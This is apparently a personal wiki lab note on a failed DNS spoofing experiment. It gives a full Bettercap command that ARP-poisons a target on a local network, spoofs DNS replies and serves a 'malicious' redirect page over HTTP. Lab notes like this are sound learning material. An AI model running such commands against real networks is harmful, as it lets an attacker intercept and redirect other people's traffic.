Bettercap/Failed DNS Spoofing Attack 2
From charlesreid1
Second experiment, now that I know I need to be running an ARP spoofing attack simultaneous with the DNS attack.
Start by running the Bettercap command:
bettercap -I wlan1 -O bettercap_extrabacon.log -S ARP -X \
--gateway 192.168.0.1 --target 192.168.0.7 \
--dns extrabacon.conf --dns-port 53 \
--httpd --httpd-path ./pub
This sets up the ARP poisoning, and runs the DNS spoofing on port 53. It runs an HTTP host to host our malicious NOPE redirect page.